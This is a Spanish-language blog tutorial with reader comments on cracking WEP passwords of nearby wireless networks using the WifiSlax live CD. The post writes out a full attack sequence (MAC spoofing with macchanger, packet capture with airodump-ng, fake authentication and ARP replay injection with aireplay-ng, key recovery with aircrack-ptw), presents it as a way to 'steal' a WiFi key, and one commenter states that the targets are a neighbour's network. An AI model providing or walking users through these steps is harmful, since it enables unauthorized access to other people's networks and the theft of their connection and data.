xdown!!

Wireless con WiFislax [Tutorial][hackea redes Wifi]



Bueno, aca traigo un tutorial para sacar claves WEP de redes inalámbricas con wifislax 3.1.

Wifislax es una distribución de KDE, que arranca con slax. Esté Live CD fue creado por seguridadwireless.net y contiene todos los programas necesarios para robar una clave wifi en unos minutos.

Ver Tutorial Wireless con Wifislax




1- Primero que todo tienen que descargarse la imagen de CD de la versión mas liviana del Wifislax 3.1 (Solo 290 MB)

Descargar Wifislax 3.1

2- Una vez descargada, deben quemarla en un CD virgen con el nero u otro programa similar.

3- Insertan el CD (Previamente configurado para el Booteo de CD) y esperan a que cargue el Menú del Live CD.

4- Eligen la alternativa que mas le acomode, a mi en lo personal solo me arrancó con la configuración de 1024x768

5- Esperan a que cargue todo.
En el login:
User: root
pass: toor

6- Una vez dentro del sistema, sigue esto paso por paso.

Abren una consola (barra inferior, en la derecha o menu, ejecutar, konsole), para cambiar la mac de la tarjeta, y escriben lo siguiente:

iwconfig

Localizo donde aparece mi tarjeta(en este caso es eth2)En todos los pasos de este tutorial donde aparece eth2 cada cual que escriba el
sitio donde aparezca su tarjeta, bien sea <>,<>,<> ó <>
lo no wireless extensions
eth no wireless extensions
eth1 no wireless extensions
eth2 EEE 802.11b/g ESSID: pf/any NIckname : "zd1211b" Encryption key f
Link Quality:0 Signel level:0 Noise level:0
Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0
Tx excessive retries:0 Invalid misc:0 Missed beacon: 0

si no os aparece nada sobre buestra usb ó tarjeta, es que esta down y hay que ponerla up y se pone con el siguiente comando:

ifconfig eth2 up


Paso-2
Abrimos otro terminal y tecleamos:

macchanger -m 00:11:22:33:44:55 eth2

Esto es para cambiar nuestra MAC.Ahora nuestra MAC aparecera con la numeración que hemos metido 00:11:22:33:44:55

Volvemos al terminal del Paso-1 y tecleamos:

airodump-ng eth2

Una vez aparezcan los BSSID anotamos el que nos interesa ( siempre que sea wep) pulsamos CTRL+C para parar el proceso.

Paso-1/3
tecleamos:

airodump-ng -c 6 -w tako eth2
Ahora empezamos a capturar paquetes.

Paso-3/1
Abrimos otra terminal y tecleamos:

ifconfig

Cogemos la MAC de tu eth2. Los 12 primeros números de HWaddr: 00:11:22:33:44:55
En este caso saldrían estos números que son los que cambiamos en el Paso-2 por nuestra MAC real.

Paso-3/2
Tecleamos:

aireplay-ng -1 0 -e WLAN_XX -a XX:XX:XX:XX:XX:XX -h 00:11:22:33:44:55 eth2

Si el nivel de señal no es relativamente bueno, no asocia. Es cuestión de mover la antena o el usb viendo dónde coge
mejor la señal que te interese, y de tener paciencia.
Puedes probar la opción -o. A veces funciona mejor:

aireplay-ng -1 30 -o 1 -e WLAN_XX -a XX:XX:XX:XX:XX:XX -h 00:11:22:33:44:55 eth2
.
Paso -4
Abrimos otro terminal y tecleamos:

aireplay-ng -3 -b XX:XX:XX:XX:XX:XX -h 00:11:22:33:44:55 eth2

Hecho esto los paquetes(#Data) en la terminal donde tenemos al airodump deberán de empezar a subir para el Access Point elegido.
Esperamos a que junte un mínimo de 30,000 #Data (Yo en lo personal me aseguré con 126.000). Cuando este por encima de ese valor,
ejecutamos:

Paso-5

aircrack-ptw tako-01.cap

Si se demora mucho en encontrar la pass, termina la aplicación y guarda el archivo.cap en un pendrive, luego te inicias windows y
arrancas el aircrack-ng Gui (interfaz gráfica) que te habrás bajado previamente y ese te encuentra la pass altiro, y listo.
A la clave que te de, le sacas los dos puntos ":".

Aircrack-ng GUI

Espero que les halla funcionado









11 comentarios:

JSBSoda dijo...

Estimado, el primero de los videos de youtube no funciona. Voy a intentar de todos modos seguir el instructivo. Saludos.

Anónimo dijo...

ola!! tengo una D-Link DWL-G122 y no consigo crear el cliente falso!! me da un erros, algo asi como ""Sending Autehentication Request"" y me lo repite en varias lineas seguidas, eso con el ataque 1, no obstante sigo con el ataque 3 (inyectar datos) pero no es capaz de recoger ningun paquete, solo los envia, ¿esto puede ser porque los drivers de mi tarjeta no sirven para eso? o cual podria ser el problema... si es por los drivers..¿donde los puedo encontrar? espero tu respuesta amigo
gracias!!

Anónimo dijo...

BUENAS ESTA CHINGON TU TUTORIAL WE BUEN APORTE PARA LA COMUNIDAD DE MINIHACKS GRACIAS LO INTENTARE MAS TARDE SALUDOS DESDE DIEGO DJ MAZATLAN SIN MEXICO

Anónimo dijo...

Bueno.... El problema no consiste en querer buscar un programa para infiltrar y atacar los modenes con sistemas de seguridad wep, ahora desarrollan nuevos formatos de seguridad más avanzadas como el wpa y wpa2, algo imposible para que el programa funcione con facilidad. Perdida de tiempo, caso lamentable.

Anónimo dijo...

Bueno.... El problema no consiste en querer buscar un programa para infiltrar y atacar los modenes con sistemas de seguridad wep, ahora desarrollan nuevos formatos de seguridad más avanzadas como el wpa y wpa2, algo imposible para que el programa funcione con facilidad. Perdida de tiempo, caso lamentable.

Anónimo dijo...

ya esta muy bien el tutorial

Unknown dijo...

super esta genial

Anónimo dijo...

Apartir del paso: Paso-3/2 me da error. Me dice que pulse: aireplay-ng --help para más ayuda.

Yo tecleo exactamente aireplay-ng -1 0 -e WLAN_XX -a XX:XX:XX:XX:XX:XX -h 00:11:22:33:44:55 eth2


WLAN_XX tiene que ser el nombre de la señal que pille?

XX:XX:XX:XX:XX:XX tiene que ser mi mac vieja?

O tengo que teclear exactmante lo que pone?

Que alguien me ayude!

Jairo Garcia - Wen Bin - 文彬 dijo...

No hombre,
WLAN_XX y XX:XX:XX:XX:XX:X son los datos de la victima, de tu vecino.

tienes que sustituirlo realmente por los datos de la red que estas atacando.

Anónimo dijo...

Hola... a mi me pasa esto...
cuando intento asociarme al AP usando:
aireplay-ng -1 0 -e NOMBRE_AP -a MAC_VECINO -h MI_MAC wlan0

no se asocia y aparece esto:
aireplay-ng for help (o algo parecido) por que sera?
Espero sus respuestas
Gracias!!!

Anónimo dijo...

haber si em funciona